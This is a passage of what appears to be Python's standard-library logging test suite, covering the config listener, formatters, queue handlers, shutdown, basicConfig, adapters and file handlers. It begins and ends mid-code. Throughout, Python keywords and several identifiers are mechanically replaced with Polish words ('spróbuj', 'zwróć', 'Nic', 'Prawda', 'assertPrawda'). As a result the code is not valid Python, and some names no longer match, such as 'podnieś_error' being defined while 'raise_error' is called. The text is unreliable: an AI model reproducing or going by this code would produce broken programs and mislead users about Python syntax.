0) t = logging.config.listen(0, verify) t.start() t.ready.wait() # Now get the port allocated port = t.port t.ready.clear() spróbuj: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2.0) sock.connect(('localhost', port)) slen = struct.pack('>L', len(text)) s = slen + text sentsofar = 0 left = len(s) dopóki left > 0: sent = sock.send(s[sentsofar:]) sentsofar += sent left -= sent sock.close() w_końcu: t.ready.wait(2.0) logging.config.stopListening() t.join(2.0) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_config_10_ok(self): przy support.captured_stdout() jako output: self.setup_via_listener(json.dumps(self.config10)) logger = logging.getLogger("compiler.parser") logger.warning(self.next_message()) logger = logging.getLogger('compiler') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger('compiler.lexer') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger("compiler.parser.codegen") #Output, jako nie filtered logger.error(self.next_message()) self.assert_log_lines([ ('WARNING', '1'), ('ERROR', '4'), ], stream=output) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_config_1_ok(self): przy support.captured_stdout() jako output: self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1)) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_verify(self): def verify_fail(stuff): zwróć Nic def verify_reverse(stuff): zwróć stuff[::-1] logger = logging.getLogger("compiler.parser") to_send = textwrap.dedent(ConfigFileTest.config1) # First, specify a verification function that will fail. 
# We expect to see no output, since our configuration # never took effect. przy support.captured_stdout() jako output: self.setup_via_listener(to_send, verify_fail) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([], stream=output) # Original logger output has the stuff we logged. self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") # Now, perform no verification. Our configuration # should take effect. przy support.captured_stdout() jako output: self.setup_via_listener(to_send) # no verify callable specified logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ], stream=output) # Original logger output still has the stuff we logged before. self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") # Now, perform verification which transforms the bytes. przy support.captured_stdout() jako output: self.setup_via_listener(to_send[::-1], verify_reverse) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '5'), ('ERROR', '6'), ], stream=output) # Original logger output still has the stuff we logged before. 
self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") def test_out_of_order(self): self.apply_config(self.out_of_order) handler = logging.getLogger('mymodule').handlers[0] self.assertIsInstance(handler.target, logging.Handler) self.assertIsInstance(handler.formatter._style, logging.StringTemplateStyle) def test_baseconfig(self): d = { 'atuple': (1, 2, 3), 'alist': ['a', 'b', 'c'], 'adict': {'d': 'e', 'f': 3 }, 'nest1': ('g', ('h', 'i'), 'j'), 'nest2': ['k', ['l', 'm'], 'n'], 'nest3': ['o', 'cfg://alist', 'p'], } bc = logging.config.BaseConfigurator(d) self.assertEqual(bc.convert('cfg://atuple[1]'), 2) self.assertEqual(bc.convert('cfg://alist[1]'), 'b') self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h') self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm') self.assertEqual(bc.convert('cfg://adict.d'), 'e') self.assertEqual(bc.convert('cfg://adict[f]'), 3) v = bc.convert('cfg://nest3') self.assertEqual(v.pop(1), ['a', 'b', 'c']) self.assertRaises(KeyError, bc.convert, 'cfg://nosuch') self.assertRaises(ValueError, bc.convert, 'cfg://!') self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]') klasa ManagerTest(BaseTest): def test_manager_loggerclass(self): logged = [] klasa MyLogger(logging.Logger): def _log(self, level, msg, args, exc_info=Nic, extra=Nic): logged.append(msg) man = logging.Manager(Nic) self.assertRaises(TypeError, man.setLoggerClass, int) man.setLoggerClass(MyLogger) logger = man.getLogger('test') logger.warning('should appear w logged') logging.warning('should nie appear w logged') self.assertEqual(logged, ['should appear w logged']) def test_set_log_record_factory(self): man = logging.Manager(Nic) expected = object() man.setLogRecordFactory(expected) self.assertEqual(man.logRecordFactory, expected) klasa ChildLoggerTest(BaseTest): def test_child_loggers(self): r = logging.getLogger() l1 = logging.getLogger('abc') l2 = logging.getLogger('def.ghi') c1 = r.getChild('xyz') c2 = r.getChild('uvw.xyz') 
self.assertIs(c1, logging.getLogger('xyz')) self.assertIs(c2, logging.getLogger('uvw.xyz')) c1 = l1.getChild('def') c2 = c1.getChild('ghi') c3 = l1.getChild('def.ghi') self.assertIs(c1, logging.getLogger('abc.def')) self.assertIs(c2, logging.getLogger('abc.def.ghi')) self.assertIs(c2, c3) klasa DerivedLogRecord(logging.LogRecord): dalej klasa LogRecordFactoryTest(BaseTest): def setUp(self): klasa CheckingFilter(logging.Filter): def __init__(self, cls): self.cls = cls def filter(self, record): t = type(record) jeżeli t jest nie self.cls: msg = 'Unexpected LogRecord type %s, expected %s' % (t, self.cls) podnieś TypeError(msg) zwróć Prawda BaseTest.setUp(self) self.filter = CheckingFilter(DerivedLogRecord) self.root_logger.addFilter(self.filter) self.orig_factory = logging.getLogRecordFactory() def tearDown(self): self.root_logger.removeFilter(self.filter) BaseTest.tearDown(self) logging.setLogRecordFactory(self.orig_factory) def test_logrecord_class(self): self.assertRaises(TypeError, self.root_logger.warning, self.next_message()) logging.setLogRecordFactory(DerivedLogRecord) self.root_logger.error(self.next_message()) self.assert_log_lines([ ('root', 'ERROR', '2'), ]) klasa QueueHandlerTest(BaseTest): # Do nie bother przy a logger name group. 
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$" def setUp(self): BaseTest.setUp(self) self.queue = queue.Queue(-1) self.que_hdlr = logging.handlers.QueueHandler(self.queue) self.que_logger = logging.getLogger('que') self.que_logger.propagate = Nieprawda self.que_logger.setLevel(logging.WARNING) self.que_logger.addHandler(self.que_hdlr) def tearDown(self): self.que_hdlr.close() BaseTest.tearDown(self) def test_queue_handler(self): self.que_logger.debug(self.next_message()) self.assertRaises(queue.Empty, self.queue.get_nowait) self.que_logger.info(self.next_message()) self.assertRaises(queue.Empty, self.queue.get_nowait) msg = self.next_message() self.que_logger.warning(msg) data = self.queue.get_nowait() self.assertPrawda(isinstance(data, logging.LogRecord)) self.assertEqual(data.name, self.que_logger.name) self.assertEqual((data.msg, data.args), (msg, Nic)) @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'), 'logging.handlers.QueueListener required dla this test') def test_queue_listener(self): handler = support.TestHandler(support.Matcher()) listener = logging.handlers.QueueListener(self.queue, handler) listener.start() spróbuj: self.que_logger.warning(self.next_message()) self.que_logger.error(self.next_message()) self.que_logger.critical(self.next_message()) w_końcu: listener.stop() self.assertPrawda(handler.matches(levelno=logging.WARNING, message='1')) self.assertPrawda(handler.matches(levelno=logging.ERROR, message='2')) self.assertPrawda(handler.matches(levelno=logging.CRITICAL, message='3')) handler.close() # Now test przy respect_handler_level set handler = support.TestHandler(support.Matcher()) handler.setLevel(logging.CRITICAL) listener = logging.handlers.QueueListener(self.queue, handler, respect_handler_level=Prawda) listener.start() spróbuj: self.que_logger.warning(self.next_message()) self.que_logger.error(self.next_message()) self.que_logger.critical(self.next_message()) w_końcu: listener.stop() 
self.assertNieprawda(handler.matches(levelno=logging.WARNING, message='4')) self.assertNieprawda(handler.matches(levelno=logging.ERROR, message='5')) self.assertPrawda(handler.matches(levelno=logging.CRITICAL, message='6')) ZERO = datetime.timedelta(0) klasa UTC(datetime.tzinfo): def utcoffset(self, dt): zwróć ZERO dst = utcoffset def tzname(self, dt): zwróć 'UTC' utc = UTC() klasa FormatterTest(unittest.TestCase): def setUp(self): self.common = { 'name': 'formatter.test', 'level': logging.DEBUG, 'pathname': os.path.join('path', 'to', 'dummy.ext'), 'lineno': 42, 'exc_info': Nic, 'func': Nic, 'msg': 'Message przy %d %s', 'args': (2, 'placeholders'), } self.variants = { } def get_record(self, name=Nic): result = dict(self.common) jeżeli name jest nie Nic: result.update(self.variants[name]) zwróć logging.makeLogRecord(result) def test_percent(self): # Test %-formatting r = self.get_record() f = logging.Formatter('${%(message)s}') self.assertEqual(f.format(r), '${Message przy 2 placeholders}') f = logging.Formatter('%(random)s') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('%(asctime)s') self.assertPrawda(f.usesTime()) f = logging.Formatter('%(asctime)-15s') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime') self.assertNieprawda(f.usesTime()) def test_braces(self): # Test {}-formatting r = self.get_record() f = logging.Formatter('$%{message}%$', style='{') self.assertEqual(f.format(r), '$%Message przy 2 placeholders%$') f = logging.Formatter('{random}', style='{') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('{asctime}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('{asctime!s:15}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('{asctime:15}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime', style='{') self.assertNieprawda(f.usesTime()) def test_dollars(self): # Test $-formatting r = 
self.get_record() f = logging.Formatter('$message', style='$') self.assertEqual(f.format(r), 'Message przy 2 placeholders') f = logging.Formatter('$$%${message}%$$', style='$') self.assertEqual(f.format(r), '$%Message przy 2 placeholders%$') f = logging.Formatter('${random}', style='$') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('${asctime}', style='$') self.assertPrawda(f.usesTime()) f = logging.Formatter('${asctime', style='$') self.assertNieprawda(f.usesTime()) f = logging.Formatter('$asctime', style='$') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime', style='$') self.assertNieprawda(f.usesTime()) def test_invalid_style(self): self.assertRaises(ValueError, logging.Formatter, Nic, Nic, 'x') def test_time(self): r = self.get_record() dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc) # We use Nic to indicate we want the local timezone # We're essentially converting a UTC time to local time r.created = time.mktime(dt.astimezone(Nic).timetuple()) r.msecs = 123 f = logging.Formatter('%(asctime)s %(message)s') f.converter = time.gmtime self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123') self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21') f.format(r) self.assertEqual(r.asctime, '1993-04-21 08:03:00,123') klasa TestBufferingFormatter(logging.BufferingFormatter): def formatHeader(self, records): zwróć '[(%d)' % len(records) def formatFooter(self, records): zwróć '(%d)]' % len(records) klasa BufferingFormatterTest(unittest.TestCase): def setUp(self): self.records = [ logging.makeLogRecord({'msg': 'one'}), logging.makeLogRecord({'msg': 'two'}), ] def test_default(self): f = logging.BufferingFormatter() self.assertEqual('', f.format([])) self.assertEqual('onetwo', f.format(self.records)) def test_custom(self): f = TestBufferingFormatter() self.assertEqual('[(2)onetwo(2)]', f.format(self.records)) lf = logging.Formatter('<%(message)s>') f = TestBufferingFormatter(lf) 
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records)) klasa ExceptionTest(BaseTest): def test_formatting(self): r = self.root_logger h = RecordingHandler() r.addHandler(h) spróbuj: podnieś RuntimeError('deliberate mistake') wyjąwszy: logging.exception('failed', stack_info=Prawda) r.removeHandler(h) h.close() r = h.records[0] self.assertPrawda(r.exc_text.startswith('Traceback (most recent ' 'call last):\n')) self.assertPrawda(r.exc_text.endswith('\nRuntimeError: ' 'deliberate mistake')) self.assertPrawda(r.stack_info.startswith('Stack (most recent ' 'call last):\n')) self.assertPrawda(r.stack_info.endswith('logging.exception(\'failed\', ' 'stack_info=Prawda)')) klasa LastResortTest(BaseTest): def test_last_resort(self): # Test the last resort handler root = self.root_logger root.removeHandler(self.root_hdlr) old_lastresort = logging.lastResort old_raise_exceptions = logging.raiseExceptions spróbuj: przy support.captured_stderr() jako stderr: root.debug('This should nie appear') self.assertEqual(stderr.getvalue(), '') root.warning('Final chance!') self.assertEqual(stderr.getvalue(), 'Final chance!\n') # No handlers oraz no last resort, so 'No handlers' message logging.lastResort = Nic przy support.captured_stderr() jako stderr: root.warning('Final chance!') msg = 'No handlers could be found dla logger "root"\n' self.assertEqual(stderr.getvalue(), msg) # 'No handlers' message only printed once przy support.captured_stderr() jako stderr: root.warning('Final chance!') self.assertEqual(stderr.getvalue(), '') # If podnieśExceptions jest Nieprawda, no message jest printed root.manager.emittedNoHandlerWarning = Nieprawda logging.raiseExceptions = Nieprawda przy support.captured_stderr() jako stderr: root.warning('Final chance!') self.assertEqual(stderr.getvalue(), '') w_końcu: root.addHandler(self.root_hdlr) logging.lastResort = old_lastresort logging.raiseExceptions = old_raise_exceptions klasa FakeHandler: def __init__(self, identifier, called): dla method w 
('acquire', 'flush', 'close', 'release'): setattr(self, method, self.record_call(identifier, method, called)) def record_call(self, identifier, method_name, called): def inner(): called.append('{} - {}'.format(identifier, method_name)) zwróć inner klasa RecordingHandler(logging.NullHandler): def __init__(self, *args, **kwargs): super(RecordingHandler, self).__init__(*args, **kwargs) self.records = [] def handle(self, record): """Keep track of all the emitted records.""" self.records.append(record) klasa ShutdownTest(BaseTest): """Test suite dla the shutdown method.""" def setUp(self): super(ShutdownTest, self).setUp() self.called = [] podnieś_exceptions = logging.raiseExceptions self.addCleanup(setattr, logging, 'raiseExceptions', podnieś_exceptions) def podnieś_error(self, error): def inner(): podnieś error() zwróć inner def test_no_failure(self): # create some fake handlers handler0 = FakeHandler(0, self.called) handler1 = FakeHandler(1, self.called) handler2 = FakeHandler(2, self.called) # create live weakref to those handlers handlers = map(logging.weakref.ref, [handler0, handler1, handler2]) logging.shutdown(handlerList=list(handlers)) expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release', '1 - acquire', '1 - flush', '1 - close', '1 - release', '0 - acquire', '0 - flush', '0 - close', '0 - release'] self.assertEqual(expected, self.called) def _test_with_failure_in_method(self, method, error): handler = FakeHandler(0, self.called) setattr(handler, method, self.raise_error(error)) handlers = [logging.weakref.ref(handler)] logging.shutdown(handlerList=list(handlers)) self.assertEqual('0 - release', self.called[-1]) def test_with_ioerror_in_acquire(self): self._test_with_failure_in_method('acquire', OSError) def test_with_ioerror_in_flush(self): self._test_with_failure_in_method('flush', OSError) def test_with_ioerror_in_close(self): self._test_with_failure_in_method('close', OSError) def test_with_valueerror_in_acquire(self): 
self._test_with_failure_in_method('acquire', ValueError) def test_with_valueerror_in_flush(self): self._test_with_failure_in_method('flush', ValueError) def test_with_valueerror_in_close(self): self._test_with_failure_in_method('close', ValueError) def test_with_other_error_in_acquire_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('acquire', IndexError) def test_with_other_error_in_flush_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('flush', IndexError) def test_with_other_error_in_close_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('close', IndexError) def test_with_other_error_in_acquire_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'acquire', IndexError) def test_with_other_error_in_flush_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'flush', IndexError) def test_with_other_error_in_close_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'close', IndexError) klasa ModuleLevelMiscTest(BaseTest): """Test suite dla some module level methods.""" def test_disable(self): old_disable = logging.root.manager.disable # confirm our assumptions are correct self.assertEqual(old_disable, 0) self.addCleanup(logging.disable, old_disable) logging.disable(83) self.assertEqual(logging.root.manager.disable, 83) def _test_log(self, method, level=Nic): called = [] support.patch(self, logging, 'basicConfig', lambda *a, **kw: called.append((a, kw))) recording = RecordingHandler() logging.root.addHandler(recording) log_method = getattr(logging, method) jeżeli level jest nie Nic: log_method(level, "test me: %r", recording) inaczej: log_method("test me: %r", recording) self.assertEqual(len(recording.records), 1) record = recording.records[0] 
self.assertEqual(record.getMessage(), "test me: %r" % recording) expected_level = level jeżeli level jest nie Nic inaczej getattr(logging, method.upper()) self.assertEqual(record.levelno, expected_level) # basicConfig was nie called! self.assertEqual(called, []) def test_log(self): self._test_log('log', logging.ERROR) def test_debug(self): self._test_log('debug') def test_info(self): self._test_log('info') def test_warning(self): self._test_log('warning') def test_error(self): self._test_log('error') def test_critical(self): self._test_log('critical') def test_set_logger_class(self): self.assertRaises(TypeError, logging.setLoggerClass, object) klasa MyLogger(logging.Logger): dalej logging.setLoggerClass(MyLogger) self.assertEqual(logging.getLoggerClass(), MyLogger) logging.setLoggerClass(logging.Logger) self.assertEqual(logging.getLoggerClass(), logging.Logger) def test_logging_at_shutdown(self): # Issue #20037 code = """jeżeli 1: zaimportuj logging klasa A: def __del__(self): spróbuj: podnieś ValueError("some error") wyjąwszy Exception: logging.exception("exception w __del__") a = A()""" rc, out, err = assert_python_ok("-c", code) err = err.decode() self.assertIn("exception w __del__", err) self.assertIn("ValueError: some error", err) klasa LogRecordTest(BaseTest): def test_str_rep(self): r = logging.makeLogRecord({}) s = str(r) self.assertPrawda(s.startswith('<LogRecord: ')) self.assertPrawda(s.endswith('>')) def test_dict_arg(self): h = RecordingHandler() r = logging.getLogger() r.addHandler(h) d = {'less' : 'more' } logging.warning('less jest %(less)s', d) self.assertIs(h.records[0].args, d) self.assertEqual(h.records[0].message, 'less jest more') r.removeHandler(h) h.close() def test_multiprocessing(self): r = logging.makeLogRecord({}) self.assertEqual(r.processName, 'MainProcess') spróbuj: zaimportuj multiprocessing jako mp r = logging.makeLogRecord({}) self.assertEqual(r.processName, mp.current_process().name) wyjąwszy ImportError: dalej def 
test_optional(self): r = logging.makeLogRecord({}) NOT_NONE = self.assertIsNotNic jeżeli threading: NOT_NONE(r.thread) NOT_NONE(r.threadName) NOT_NONE(r.process) NOT_NONE(r.processName) log_threads = logging.logThreads log_processes = logging.logProcesses log_multiprocessing = logging.logMultiprocessing spróbuj: logging.logThreads = Nieprawda logging.logProcesses = Nieprawda logging.logMultiprocessing = Nieprawda r = logging.makeLogRecord({}) NONE = self.assertIsNic NONE(r.thread) NONE(r.threadName) NONE(r.process) NONE(r.processName) w_końcu: logging.logThreads = log_threads logging.logProcesses = log_processes logging.logMultiprocessing = log_multiprocessing klasa BasicConfigTest(unittest.TestCase): """Test suite dla logging.basicConfig.""" def setUp(self): super(BasicConfigTest, self).setUp() self.handlers = logging.root.handlers self.saved_handlers = logging._handlers.copy() self.saved_handler_list = logging._handlerList[:] self.original_logging_level = logging.root.level self.addCleanup(self.cleanup) logging.root.handlers = [] def tearDown(self): dla h w logging.root.handlers[:]: logging.root.removeHandler(h) h.close() super(BasicConfigTest, self).tearDown() def cleanup(self): setattr(logging.root, 'handlers', self.handlers) logging._handlers.clear() logging._handlers.update(self.saved_handlers) logging._handlerList[:] = self.saved_handler_list logging.root.level = self.original_logging_level def test_no_kwargs(self): logging.basicConfig() # handler defaults to a StreamHandler to sys.stderr self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.StreamHandler) self.assertEqual(handler.stream, sys.stderr) formatter = handler.formatter # format defaults to logging.BASIC_FORMAT self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT) # datefmt defaults to Nic self.assertIsNic(formatter.datefmt) # style defaults to % self.assertIsInstance(formatter._style, logging.PercentStyle) # level jest nie 
explicitly set self.assertEqual(logging.root.level, self.original_logging_level) def test_strformatstyle(self): przy support.captured_stdout() jako output: logging.basicConfig(stream=sys.stdout, style="{") logging.error("Log an error") sys.stdout.seek(0) self.assertEqual(output.getvalue().strip(), "ERROR:root:Log an error") def test_stringtemplatestyle(self): przy support.captured_stdout() jako output: logging.basicConfig(stream=sys.stdout, style="$") logging.error("Log an error") sys.stdout.seek(0) self.assertEqual(output.getvalue().strip(), "ERROR:root:Log an error") def test_filename(self): def cleanup(h1, h2, fn): h1.close() h2.close() os.remove(fn) logging.basicConfig(filename='test.log') self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.FileHandler) expected = logging.FileHandler('test.log', 'a') self.assertEqual(handler.stream.mode, expected.stream.mode) self.assertEqual(handler.stream.name, expected.stream.name) self.addCleanup(cleanup, handler, expected, 'test.log') def test_filemode(self): def cleanup(h1, h2, fn): h1.close() h2.close() os.remove(fn) logging.basicConfig(filename='test.log', filemode='wb') handler = logging.root.handlers[0] expected = logging.FileHandler('test.log', 'wb') self.assertEqual(handler.stream.mode, expected.stream.mode) self.addCleanup(cleanup, handler, expected, 'test.log') def test_stream(self): stream = io.StringIO() self.addCleanup(stream.close) logging.basicConfig(stream=stream) self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.StreamHandler) self.assertEqual(handler.stream, stream) def test_format(self): logging.basicConfig(format='foo') formatter = logging.root.handlers[0].formatter self.assertEqual(formatter._style._fmt, 'foo') def test_datefmt(self): logging.basicConfig(datefmt='bar') formatter = logging.root.handlers[0].formatter self.assertEqual(formatter.datefmt, 'bar') def 
test_style(self): logging.basicConfig(style='$') formatter = logging.root.handlers[0].formatter self.assertIsInstance(formatter._style, logging.StringTemplateStyle) def test_level(self): old_level = logging.root.level self.addCleanup(logging.root.setLevel, old_level) logging.basicConfig(level=57) self.assertEqual(logging.root.level, 57) # Test that second call has no effect logging.basicConfig(level=58) self.assertEqual(logging.root.level, 57) def test_incompatible(self): assertRaises = self.assertRaises handlers = [logging.StreamHandler()] stream = sys.stderr assertRaises(ValueError, logging.basicConfig, filename='test.log', stream=stream) assertRaises(ValueError, logging.basicConfig, filename='test.log', handlers=handlers) assertRaises(ValueError, logging.basicConfig, stream=stream, handlers=handlers) # Issue 23207: test dla invalid kwargs assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO) # Should pop both filename oraz filemode even jeżeli filename jest Nic logging.basicConfig(filename=Nic, filemode='a') def test_handlers(self): handlers = [ logging.StreamHandler(), logging.StreamHandler(sys.stdout), logging.StreamHandler(), ] f = logging.Formatter() handlers[2].setFormatter(f) logging.basicConfig(handlers=handlers) self.assertIs(handlers[0], logging.root.handlers[0]) self.assertIs(handlers[1], logging.root.handlers[1]) self.assertIs(handlers[2], logging.root.handlers[2]) self.assertIsNotNic(handlers[0].formatter) self.assertIsNotNic(handlers[1].formatter) self.assertIs(handlers[2].formatter, f) self.assertIs(handlers[0].formatter, handlers[1].formatter) def _test_log(self, method, level=Nic): # logging.root has no handlers so basicConfig should be called called = [] old_basic_config = logging.basicConfig def my_basic_config(*a, **kw): old_basic_config() old_level = logging.root.level logging.root.setLevel(100) # avoid having messages w stderr self.addCleanup(logging.root.setLevel, old_level) called.append((a, kw)) support.patch(self, logging, 
'basicConfig', my_basic_config) log_method = getattr(logging, method) jeżeli level jest nie Nic: log_method(level, "test me") inaczej: log_method("test me") # basicConfig was called przy no arguments self.assertEqual(called, [((), {})]) def test_log(self): self._test_log('log', logging.WARNING) def test_debug(self): self._test_log('debug') def test_info(self): self._test_log('info') def test_warning(self): self._test_log('warning') def test_error(self): self._test_log('error') def test_critical(self): self._test_log('critical') klasa LoggerAdapterTest(unittest.TestCase): def setUp(self): super(LoggerAdapterTest, self).setUp() old_handler_list = logging._handlerList[:] self.recording = RecordingHandler() self.logger = logging.root self.logger.addHandler(self.recording) self.addCleanup(self.logger.removeHandler, self.recording) self.addCleanup(self.recording.close) def cleanup(): logging._handlerList[:] = old_handler_list self.addCleanup(cleanup) self.addCleanup(logging.shutdown) self.adapter = logging.LoggerAdapter(logger=self.logger, extra=Nic) def test_exception(self): msg = 'testing exception: %r' exc = Nic spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.adapter.exception(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.ERROR) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_exception_excinfo(self): spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.adapter.exception('exc_info test', exc_info=exc) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_critical(self): msg = 'critical test! 
%r' self.adapter.critical(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.CRITICAL) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) def test_is_enabled_for(self): old_disable = self.adapter.logger.manager.disable self.adapter.logger.manager.disable = 33 self.addCleanup(setattr, self.adapter.logger.manager, 'disable', old_disable) self.assertNieprawda(self.adapter.isEnabledFor(32)) def test_has_handlers(self): self.assertPrawda(self.adapter.hasHandlers()) dla handler w self.logger.handlers: self.logger.removeHandler(handler) self.assertNieprawda(self.logger.hasHandlers()) self.assertNieprawda(self.adapter.hasHandlers()) klasa LoggerTest(BaseTest): def setUp(self): super(LoggerTest, self).setUp() self.recording = RecordingHandler() self.logger = logging.Logger(name='blah') self.logger.addHandler(self.recording) self.addCleanup(self.logger.removeHandler, self.recording) self.addCleanup(self.recording.close) self.addCleanup(logging.shutdown) def test_set_invalid_level(self): self.assertRaises(TypeError, self.logger.setLevel, object()) def test_exception(self): msg = 'testing exception: %r' exc = Nic spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.logger.exception(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.ERROR) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_log_invalid_level_with_raise(self): przy support.swap_attr(logging, 'raiseExceptions', Prawda): self.assertRaises(TypeError, self.logger.log, '10', 'test message') def test_log_invalid_level_no_raise(self): przy support.swap_attr(logging, 'raiseExceptions', Nieprawda): self.logger.log('10', 'test message') # no exception happens def 
test_find_caller_with_stack_info(self): called = [] support.patch(self, logging.traceback, 'print_stack', lambda f, file: called.append(file.getvalue())) self.logger.findCaller(stack_info=Prawda) self.assertEqual(len(called), 1) self.assertEqual('Stack (most recent call last):\n', called[0]) def test_make_record_with_extra_overwrite(self): name = 'my record' level = 13 fn = lno = msg = args = exc_info = func = sinfo = Nic rv = logging._logRecordFactory(name, level, fn, lno, msg, args, exc_info, func, sinfo) dla key w ('message', 'asctime') + tuple(rv.__dict__.keys()): extra = {key: 'some value'} self.assertRaises(KeyError, self.logger.makeRecord, name, level, fn, lno, msg, args, exc_info, extra=extra, sinfo=sinfo) def test_make_record_with_extra_no_overwrite(self): name = 'my record' level = 13 fn = lno = msg = args = exc_info = func = sinfo = Nic extra = {'valid_key': 'some value'} result = self.logger.makeRecord(name, level, fn, lno, msg, args, exc_info, extra=extra, sinfo=sinfo) self.assertIn('valid_key', result.__dict__) def test_has_handlers(self): self.assertPrawda(self.logger.hasHandlers()) dla handler w self.logger.handlers: self.logger.removeHandler(handler) self.assertNieprawda(self.logger.hasHandlers()) def test_has_handlers_no_propagate(self): child_logger = logging.getLogger('blah.child') child_logger.propagate = Nieprawda self.assertNieprawda(child_logger.hasHandlers()) def test_is_enabled_for(self): old_disable = self.logger.manager.disable self.logger.manager.disable = 23 self.addCleanup(setattr, self.logger.manager, 'disable', old_disable) self.assertNieprawda(self.logger.isEnabledFor(22)) def test_root_logger_aliases(self): root = logging.getLogger() self.assertIs(root, logging.root) self.assertIs(root, logging.getLogger(Nic)) self.assertIs(root, logging.getLogger('')) self.assertIs(root, logging.getLogger('foo').root) self.assertIs(root, logging.getLogger('foo.bar').root) self.assertIs(root, logging.getLogger('foo').parent) self.assertIsNot(root, 
logging.getLogger('\0')) self.assertIsNot(root, logging.getLogger('foo.bar').parent) def test_invalid_names(self): self.assertRaises(TypeError, logging.getLogger, any) self.assertRaises(TypeError, logging.getLogger, b'foo') klasa BaseFileTest(BaseTest): "Base klasa dla handler tests that write log files" def setUp(self): BaseTest.setUp(self) fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-") os.close(fd) self.rmfiles = [] def tearDown(self): dla fn w self.rmfiles: os.unlink(fn) jeżeli os.path.exists(self.fn): os.unlink(self.fn) BaseTest.tearDown(self) def assertLogFile(self, filename): "Assert a log file jest there oraz register it dla deletion" self.assertPrawda(os.path.exists(filename), msg="Log file %r does nie exist" % filename) self.rmfiles.append(filename) klasa FileHandlerTest(BaseFileTest): def test_delay(self): os.unlink(self.fn) fh = logging.FileHandler(self.fn, delay=Prawda) self.assertIsNic(fh.stream) self.assertNieprawda(os.path.exists(self.fn)) fh.handle(logging.makeLogRecord({})) self.assertIsNotNic(fh.stream) self.assertPrawda(os.path.exists(self.fn)) fh.close() klasa RotatingFileHandlerTest(BaseFileTest): def next_rec(self): zwróć logging.LogRecord('n', logging.DEBUG, 'p', 1, self.next_message(), Nic, Nic, Nic) def test_should_not_rollover(self): # If maxbytes jest zero rollover never occurs rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0) self.assertNieprawda(rh.shouldRollover(Nic)) rh.close() def test_should_rollover(self): rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1) self.assertPrawda(rh.shouldRollover(self.next_rec())) rh.close() def test_file_created(self): # checks that the file jest created oraz assumes it was created # by us rh = 